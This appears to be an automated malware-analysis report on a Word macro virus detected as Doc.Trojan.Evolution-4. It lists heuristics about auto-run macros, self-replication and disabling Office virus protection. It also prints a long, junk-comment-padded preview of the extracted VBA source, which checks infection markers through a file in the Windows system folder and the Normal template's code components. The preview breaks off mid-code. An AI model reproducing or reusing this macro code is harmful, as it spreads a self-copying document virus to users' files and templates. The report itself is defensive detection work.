Verdict: MALICIOUS
Risk Score: 256
MITRE ATT&CK: T1059.005 Visual Basic

Malware Insights
The file exhibits characteristics of legacy macro viruses and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code automatically. ClamAV detections further confirm its malicious nature, classifying it as Doc.Trojan.Evolution-4. The extensive size of the VBA macro source suggests a complex payload, likely designed for execution upon document interaction.
Heuristics (6)
- ClamAV: Doc.Trojan.Evolution-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Evolution-4
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Sub AutoClose()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 700408 bytes |

SHA-256: 82cddaf3b28b90f0c09cc732e8c9aa572c01ae882648280b5100f59bc6678c73

Detection: ClamAV: Doc.Trojan.Evolution-4
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FHCITRCD"
'2319651
'A
'10:43:11
'HOME
'12-13-1999
'17:19:55
'Ditry PC
'Pima County Library
'12-13-1999
'A
'12-13-1999
'11-19-1999
'DP
'17:19:55
'10:43:11
Public Source As String
'10:43:11
'17:19:55
'Ditry PC
'Home Office 97
'DP
'11-22-1999
'10:43:11
'11-10-1999
'12-13-1999
'3444285
'10:43:11
'HOME
'8522026
'A
'2450732
Public ByeMacro As String
'Ditry PC
'11-22-1999
'10:43:11
'Home Office 97
'5990278
'8253791
'12-13-1999
'PCL
'Ditry PC
'7991627
'Ditry PC
'HOME
'3454443
'17:19:55
'10:43:11
Public Hostinf As Boolean
'6117274
'Avert
'12-13-1999
'Home Office 97
'795698
'17:19:55
'DP
'Pima County Library
'12-13-1999
'A
'12-13-1999
'18:53:43
'Ditry PC
'6856834
'2295135
Public FileInf As Boolean
'3302932
'Avert
'DP
'7716587
'DP
'17:19:55
'12-13-1999
'PCL
'12-13-1999
'A
'Ditry PC
'HOME
'12-13-1999
'A
'10:43:11
Public FExport As String
'767097
'11-22-1999
'Ditry PC
'18:53:43
'12-13-1999
'17:19:55
'12-13-1999
'4215783
'10:43:11
'5459878
'12-13-1999
'2780085
'12-13-1999
'A
'Ditry PC
Public PMExport As String
'10:43:11
'17:19:55
'3044854
'Home Office 97
'8497511
'Avert
'Ditry PC
'5350576
'DP
'9130505
'DP
'HOME
'12-13-1999
'11-22-1999
'6219754
Public PMFile_Yes As Boolean
'8624507
'11-22-1999
'10:43:11
'11-19-1999
'1778979
'11-22-1999
'12-13-1999
'7755328
'10:43:11
'912536
'Ditry PC
'Home Office 97
'8751503
'1920333
'DP
Public Ex_Yes As Boolean
'10:43:11
'A
'10:43:11
'Home Office 97
'DP
'A
'12-13-1999
'13:12:27
'Ditry PC
'11-22-1999
'DP
'18:53:43
'10:43:11
'11-22-1999
'DP
Public Filename As String
'12-13-1999
'11-22-1999
'12-13-1999
'18:53:43
'10:43:11
'9519665
'DP
'Pima County Library
'Ditry PC
'A
'DP
'HOME
'DP
'17:19:55
'9632303
Public FileID As String
'Ditry PC
'Avert
'10:43:11
'Home Office 97
'10:43:11
'5332882
'10:43:11
'Pima County Library
'10:43:11
'Avert
'12-13-1999
'Home Office 97
'12-13-1999
'6598756
'Ditry PC
Public FileID2 As String
'3688006
'Avert
'12-13-1999
'18:53:43
'10:43:11
'17:19:55
'10:43:11
'11-10-1999
'10:43:11
'1662255
'Ditry PC
'HOME
'4953880
'7114912
'7231637
Public Virname As String
'Ditry PC
'11-22-1999
'Ditry PC
'18:53:43
'DP
'17:19:55
'Ditry PC
'13:12:27
'10:43:11
'17:19:55
'DP
'11-19-1999
'DP
'11-22-1999
'Ditry PC
Public FC_There As Boolean
'10:43:11
'A
'12-13-1999
'Home Office 97
'12-13-1999
'11-22-1999
'10:43:11
'13:12:27
'DP
'7241908
'2037057
'HOME
'3171850
'Avert
'5576602
Public FO_There As Boolean
'DP
'396380
'Ditry PC
'11-19-1999
'10:43:11
'5722042
'Ditry PC
'7882324
'DP
'Avert
'10:43:11
'18:53:43
'5703598
'A
'DP
Public FP_There As Boolean
'3429928
'11-22-1999
'12-13-1999
'Home Office 97
'Ditry PC
'A
'DP
'PCL
'DP
'17:19:55
'1025175
'11-19-1999
'10:43:11
'Avert
'Ditry PC
Public FN_There As Boolean
'7358633
'A
'10:43:11
'HOME
'DP
'3059211
'12-13-1999
'5608654
'Ditry PC
'A
'12-13-1999
'5442916
'DP
'17:19:55
'10:43:11
Public FS_There As Boolean
'10:43:11
'17:19:55
'10:43:11
'7974664
'DP
'11-22-1999
'Ditry PC
'11-10-1999
'10:43:11
'2051415
'10:43:11
'HOME
'640101
'17:19:55
'10:43:11
Public FSA_There As Boolean
'DP
'11-22-1999
'10:43:11
'HOME
'10:43:11
'17:19:55
'10:43:11
'11-10-1999
'1905975
'A
'12-13-1999
'HOME
'12-13-1999
'8249705
'DP
Public VrusName As String
'10:43:11
'Avert
'9501222
'Home Office 97
'10:43:11
'Avert
'DP
'Pima County Library
'5834680
'7217393
'10:43:11
'18:53:43
'Ditry PC
'9622146
'Ditry PC
Public Armor As Boolean
'1156257
'17:19:55
'Ditry PC
'18:53:43
'7485629
'A
'17378
'PCL
'DP
'Avert
'8235347
'6577708
'10:43:11
'17:19:55
'10:43:11
Function Source_Check()
'3298846
'17:19:55
'12-13-1999
'379418
'2422131
'A
'12-13-1999
'3203901
'12-13-1999
'9749142
'Ditry PC
'Home Office 97
'DP
'A
'DP
On Error Resume Next
'12-13-1999
'Avert
'12-13-1999
'HOME
'Ditry PC
'17:19:55
'DP
'11-10-1999
'Ditry PC
'Avert
'4310728
'18:53:43
'9890381
'11-22-1999
'Ditry PC
Application.EnableCancelKey = wdCancelDisabled
'10:43:11
'A
'Ditry PC
'11-19-1999
'3561010
'A
'4695802
'11-10-1999
'7100555
'11-22-1999
'10:43:11
'5180752
'DP
'A
'Ditry PC
If MacroContainer = NormalTemplate Then Source = "Host": Exit Function
'DP
'6078515
'10:43:11
'Home Office 97
'DP
'11-22-1999
'7227551
'9537359
'DP
'A
'Ditry PC
'6446626
'DP
'888021
'Ditry PC
If MacroContainer = ActiveDocument Then Source = "File"
'12-13-1999
'17:19:55
'9763385
'11-19-1999
'12-13-1999
'629943
'1029261
'13:12:27
'12-13-1999
'Avert
'Ditry PC
'Home Office 97
'6092758
'6959315
'DP
End Function
'10:43:11
'9491064
'8108351
'HOME
'DP
'A
'4437724
'2200190
'6969473
'11-22-1999
'DP
'11-19-1999
'12-13-1999
'A
'4826884
Function Self_Recognition()
'DP
'4685644
'12-13-1999
'HOME
'12-13-1999
'11-22-1999
'10:43:11
'Pima County Library
'9374225
'8094107
'10:43:11
'HOME
'10:43:11
'1895817
'DP
On Error Resume Next
'DP
'Avert
'8239433
'Home Office 97
'10:43:11
'11-22-1999
'DP
'11-10-1999
'2032971
'17:19:55
'Ditry PC
'HOME
'10:43:11
'A
'6842477
Application.EnableCancelKey = wdCancelDisabled
'DP
'11-22-1999
'10:43:11
'HOME
'Ditry PC
'11-22-1999
'513105
'PCL
'12-13-1999
'11-22-1999
'12-13-1999
'Home Office 97
'Ditry PC
'Avert
'2295135
Open "C:\windows\system\vnames.cpl" For Input As #1
'3302932
'4554562
'DP
'8748898
'DP
'Avert
'12-13-1999
'1188308
'12-13-1999
'Avert
'Ditry PC
'1153652
'12-13-1999
'9364068
'10:43:11
Do
'767097
'17:19:55
'Ditry PC
'18:53:43
'12-13-1999
'A
'12-13-1999
'PCL
'10:43:11
'17:19:55
'12-13-1999
'11-19-1999
'12-13-1999
'11-22-1999
'Ditry PC
Line Input #1, Virname
'10:43:11
'5435363
'3044854
'Home Office 97
'8497511
'7967111
'Ditry PC
'2327186
'DP
'A
'DP
'11-19-1999
'12-13-1999
'2280891
'6219754
For Z = 1 To ActiveDocument.VBProject.VBComponents.Count
'8624507
'Avert
'10:43:11
'18:53:43
'1778979
'7086311
'12-13-1999
'13:12:27
'10:43:11
'11-22-1999
'Ditry PC
'18:53:43
'8751503
'6701237
'DP
If ActiveDocument.VBProject.VBComponents(Z).Name <> "ThisDocument" Then
'10:43:11
'9359982
'10:43:11
'1280648
'DP
'3288688
'12-13-1999
'PCL
'Ditry PC
'Avert
'Ditry PC
'HOME
'12-13-1999
'11-22-1999
'Ditry PC
If Virname = ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo lost
'DP
'6828233
'DP
'HOME
'12-13-1999
'11-22-1999
'Ditry PC
'11-10-1999
'2241685
'3030610
'Ditry PC
'18:53:43
'10:43:11
'Avert
'Ditry PC
If Virname <> ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo newname
'5912312
'5566445
'12-13-1999
'HOME
'12-13-1999
'A
'12-13-1999
'13:12:27
'10:43:11
'A
'DP
'11-19-1999
'8702139
'Avert
'DP
newname:
'DP
'17:19:55
'3511646
'Home Office 97
'12-13-1999
'A
'6301472
'13:12:27
'DP
'Avert
'10:43:11
'HOME
'Ditry PC
'17:19:55
'2114689
Close #1
'Ditry PC
'11-22-1999
'3380564
'18:53:43
'Ditry PC
'A
'Ditry PC
'PCL
'8444061
'3292774
'DP
'HOME
'DP
'4300570
'12-13-1999
Open "C:\windows\system\vnames.cpl" For Append As #1
'Ditry PC
'5562359
'10:43:11
'11-19-1999
'12-13-1999
'11-22-1999
'10:43:11
'2454182
'12-13-1999
'17:19:55
'10:43:11
'11-19-1999
'6170390
'Avert
'7178187
Print #1, ActiveDocument.VBProject.VBComponents(Z).Name
'2503849
'17:19:55
'12-13-1999
'HOME
'10:43:11
'17:19:55
'12-13-1999
'PCL
'Ditry PC
'17:19:55
'10:43:11
'HOME
'Ditry PC
'A
'DP
Close #1
'9841017
'11-22-1999
'Ditry PC
'Home Office 97
'10:43:11
'11-22-1999
'10:43:11
'11-10-1999
'12-13-1999
'17:19:55
'8833221
'HOME
'10:43:11
'17:19:55
'12-13-1999
End If
'Ditry PC
'A
'DP
'2157363
'5031512
'11-22-1999
'Ditry PC
'13:12:27
'12-13-1999
'A
'12-13-1999
'HOME
'12-13-1999
'Avert
'Ditry PC
If ActiveDocument.VBProject.VBComponents(Z).Name = "ThisDocument" Then GoTo lost
'4646438
'A
'12-13-1999
'HOME
'10:43:11
'Avert
'12-13-1999
'Pima County Library
'12-13-1999
'Avert
'Ditry PC
'4586631
'12-13-1999
'A
'12-13-1999
lost:
'12-13-1999
'2153895
'10:43:11
'HOME
'12-13-1999
'Avert
'DP
'11-10-1999
'10:43:11
'Avert
'Ditry PC
'5725509
'12-13-1999
'Avert
'10:43:11
Next Z
'Ditry PC
'Avert
'12-13-1999
'18:53:43
'Ditry PC
'Avert
'10:43:11
'PCL
'12-13-1999
'11-22-1999
'12-13-1999
'18:53:43
'848815
'9232986
'10:43:11
Loop Until EOF(1)
'DP
'A
'7436265
'11-19-1999
'DP
'11-22-1999
'Ditry PC
'PCL
'975811
'4296484
'10:43:11
'18:53:43
'Ditry PC
'Avert
'12-13-1999
Close #1
'12-13-1999
'Avert
'Ditry PC
'18:53:43
'Ditry PC
'11-22-1999
'DP
'11-10-1999
'10:43:11
'17:19:55
'DP
'HOME
'DP
'11-22-1999
'DP
Dim Lib
'1106893
'A
'Ditry PC
'HOME
'DP
'17:19:55
'DP
'PCL
'4904516
'Avert
'5785316
'9523132
'9968013
'11-22-1999
'DP
Open "C:\windows\system\vnames.cpl" For Input As #1
'6043394
'17:19:55
'99096
'11-19-1999
'10:43:11
'Avert
'10:43:11
'PCL
'10:43:11
'11-22-1999
'10:43:11
'18:53:43
'Ditry PC
'17:19:55
'12-13-1999
Do
'Ditry PC
'A
'6039308
'Home Office 97
'12-13-1999
'Avert
'Ditry PC
'11-10-1999
'10:43:11
'Avert
'10:43:11
'11-19-1999
'Ditry PC
'11-22-1999
'7305183
Line Input #1, Virname
'9582939
'A
'10:43:11
'HOME
'Ditry PC
'Avert
'DP
'Pima County Library
'10:43:11
'A
'Ditry PC
'HOME
'DP
'4558648
'1233889
For Lib = 1 To NormalTemplate.VBProject.VBComponents.Count
'10:43:11
'5693441
'Ditry PC
'11-19-1999
'4519442
'8098193
'8575143
'PCL
'10:43:11
'17:19:55
'12-13-1999
'HOME
'10:43:11
'Avert
'12-13-1999
If NormalTemplate.VBProject.VBComponents(Lib).Name = "ThisDocument" Then GoTo skip
'Ditry PC
'Avert
'DP
'HOME
'10:43:11
'11-22-1999
'10:43:11
'3593061
'Ditry PC
'17:19:55
'DP
'11-19-1999
'DP
'17:19:55
'12-13-1999
If NormalTemplate.VBProject.VBComponents(Lib).Name = Virname Then Hostinf = True: GoTo doccheck
'10:43:11
'8225189
'4777520
'1411730
'12-13-1999
'A
'Ditry PC
'Pima County Library
'Ditry PC
'5951519
'10:43:11
'6991383
'12-13-1999
'11-22-1999
'12-13-1999
skip:
'Ditry PC
'11-22-1999
'10:43:11
'Home Office 97
'Ditry PC
'Avert
'9709936
'3334983
'10:43:11
'A
'2372767
'6733305
'12-13-1999
'3546766
'7051191
Next Lib
'DP
'11-22-1999
'DP
'Home Office 97
'DP
'11-22-1999
'2499763
'13:12:27
'10:43:11
'A
'10:43:11
'3062678
'12-13-1999
'7090397
'Ditry PC
Loop Until EOF(1)
'Ditry PC
'A
'DP
'5594427
'DP
'11-22-1999
'6297386
'11-10-1999
'12-13-1999
'9105990
'10:43:11
'HOME
'Ditry PC
'Avert
'8317065
doccheck:
'DP
'17:19:55
'12-13-1999
'11-19-1999
'DP
'17:19:55
'DP
'PCL
'7309269
'17:19:55
'10:43:11
'HOME
'3765638
'A
'Ditry PC
Close #1
'3507560
'Avert
'Ditry PC
'789008
'DP
'Avert
'10:43:11
'11-10-1999
'DP
'Avert
'10:43:11
'11-19-1999
'10:43:11
'3161692
'12-13-1999
Open "C:\windows\system\vnames.cpl" For Input As #1
'10:43:11
'11-22-1999
'DP
'HOME
'DP
'17:19:55
'12-13-1999
'6899043
'5035598
'17:19:55
'4773434
'11-19-1999
'12-13-1999
'17:19:55
'12-13-1999
Do
'Ditry PC
'17:19:55
'DP
'11-19-1999
'3638642
'4427566
'12-13-1999
'Pima County Library
'Ditry PC
'11-22-1999
'DP
'Home Office 97
'DP
'A
'12-13-1999
…